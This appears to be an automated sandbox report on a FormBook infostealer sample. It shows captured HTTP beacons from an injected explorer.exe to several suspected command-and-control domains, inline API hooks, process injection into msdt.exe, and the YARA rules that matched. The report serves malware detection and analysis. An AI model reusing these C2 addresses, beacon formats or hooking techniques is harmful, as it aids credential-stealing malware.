                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Hy6RGj3U2trNFDIi49tEQi0GZsQFxr7l0Ray0Ffsh9iRYzorE4BdUxuNADlZG2tZwzAnW9QWCppMCJ9Mq/PPUA==><head><meta charset="utf-8"><title>emdefencetech.com&nbsp;-&nbsp;emdefencetech Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="emdefencetech.com is your first and best source for all of the information youre looking for.
                                    Sep 7, 2023 08:39:01.876183987 CEST142INData Raw: 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 65 6d 64 65 66 65 6e 63 65 74 65 63 68 2e
                                    Data Ascii: From general topics to more of what you would expect to find here, emdefencetech.com has it all. We hope 576you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templa
                                    Sep 7, 2023 08:39:01.876255989 CEST144INData Raw: 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a
                                    Data Ascii: rflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=s576ubmit]{-web
                                    Sep 7, 2023 08:39:01.876389980 CEST145INData Raw: 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f
                                    Data Ascii: announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{tex
                                    Sep 7, 2023 08:39:01.876463890 CEST146INData Raw: 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c
                                    Data Ascii: ontainer-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us_
                                    Sep 7, 2023 08:39:01.876555920 CEST147INData Raw: 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69
                                    Data Ascii: sition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;displ
                                    Sep 7, 2023 08:39:01.876629114 CEST148INData Raw: 35 37 36 0d 0a 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 2d 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65
                                    Data Ascii: 576r:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:
                                    Sep 7, 2023 08:39:01.876708031 CEST150INData Raw: 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f
                                    Data Ascii: th:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border15D8-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}in
                                    Sep 7, 2023 08:39:01.876780033 CEST151INData Raw: 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 70 6f 73 69 74 69 6f 6e 3a
                                    Data Ascii: s.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;
                                    Sep 7, 2023 08:39:01.876853943 CEST152INData Raw: 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d
                                    Data Ascii: fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-
                                    Sep 7, 2023 08:39:02.193577051 CEST154INData Raw: 6e 74 61 69 6e 65 72 7b 67 72 69 64 2d 61 72 65 61 3a 31 2f 32 2f 32 2f 36 7d 2e 6c 65 66 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 69 6d 67 2e 73 65 64 6f 70 61
                                    Data Ascii: ntainer{grid-area:1/2/2/6}.left-container{background-image:url("https://img.sedoparking.com/templates/bg/NameSiloLogo.png");background-size:9vw;background-repeat:no-repeat;margin-right:10px;grid-area:1/1/2/2} </style><script type="text/ja


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.849772104.21.48.6880C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 7, 2023 08:39:22.654042959 CEST166OUTGET /us94/?FV9l7b=dEK1UcEseC60ArM7bnAGctGEpZul5aHqilxPZgyrfd7+4uauQhfO1u/GuBaUBJFU+KOU&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.nazadypro.shop
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 7, 2023 08:39:22.856993914 CEST167INHTTP/1.1 404 Not Found
                                    Date: Thu, 07 Sep 2023 06:39:22 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kTYDAkJwCyw0%2BnhK7NN2bcwb94Iew%2FOYP2vLbo1Mp%2BeteJHtybie0loptL9iJqTk55Y3OiGn4digZd6g4%2BoNGUC4NxW6%2FXzw5tX3zUoews%2B3g0ZC575%2BgflLHEfb2IbFUbaSogI%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 802cf4470aa209f7-LAS
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                    Sep 7, 2023 08:39:22.857034922 CEST167INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.84977366.235.200.14580C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 7, 2023 08:39:43.584228992 CEST168OUTGET /us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.soccercitycupsc.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 7, 2023 08:39:43.939963102 CEST168INHTTP/1.1 301 Moved Permanently
                                    Date: Thu, 07 Sep 2023 06:39:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                    X-Redirect-By: WordPress
                                    Content-Security-Policy: upgrade-insecure-requests
                                    Location: http://soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                    X-Endurance-Cache-Level: 0
                                    X-nginx-cache: WordPress
                                    CF-Cache-Status: MISS
                                    Server: cloudflare
                                    CF-RAY: 802cf4c9db4209f9-LAS
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.84977434.120.175.6580C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 7, 2023 08:40:07.074596882 CEST169OUTGET /us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.69v39.top
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 7, 2023 08:40:07.392153978 CEST171INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Thu, 07 Sep 2023 06:40:07 GMT
                                    Content-Type: text/html
                                    Content-Length: 5351
                                    Last-Modified: Wed, 02 Aug 2023 04:25:02 GMT
                                    Vary: Accept-Encoding
                                    ETag: "64c9da9e-14e7"
                                    Cache-Control: no-cache
                                    Accept-Ranges: bytes
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 33 39 2e 31 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f
                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.39.11",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}functio
                                    Sep 7, 2023 08:40:07.392225981 CEST172INData Raw: 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5
                                    Data Ascii: n baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function sen
                                    Sep 7, 2023 08:40:07.392257929 CEST172INData Raw: 79 28 69 29 26 26 74 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29
                                    Data Ascii: y(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||
                                    Sep 7, 2023 08:40:07.392286062 CEST174INData Raw: 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62
                                    Data Ascii: d"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&
                                    Sep 7, 2023 08:40:07.392321110 CEST175INData Raw: 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 24 73 63 72 69 70 74 31 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63
                                    Data Ascii: n","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossori
                                    Sep 7, 2023 08:40:07.392340899 CEST175INData Raw: e7 bd 91 e7 ab 99 ef bc 9a 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 61 64 22 3e e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69
                                    Data Ascii: </div><div class="no-ad"></div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.ed78827af54b11b592f7.js"></script></body


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:1
                                    Start time:08:38:12
                                    Start date:07/09/2023
                                    Path:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Imagebase:0x600000
                                    File size:995'840 bytes
                                    MD5 hash:4F91D6F43A69717FF16F3C09DCD0E7E8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:08:38:14
                                    Start date:07/09/2023
                                    Path:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\2FcJgghyXg.exe
                                    Imagebase:0xb90000
                                    File size:995'840 bytes
                                    MD5 hash:4F91D6F43A69717FF16F3C09DCD0E7E8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:08:38:15
                                    Start date:07/09/2023
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff62dba0000
                                    File size:5'308'592 bytes
                                    MD5 hash:DDB206DDECAF3B327A418B262EE33468
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.2509035504.00000000088AF000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:moderate
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:08:38:18
                                    Start date:07/09/2023
                                    Path:C:\Windows\SysWOW64\msdt.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\msdt.exe
                                    Imagebase:0x7e0000
                                    File size:389'632 bytes
                                    MD5 hash:35F3075ABFA89839B62E52CD29F62954
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
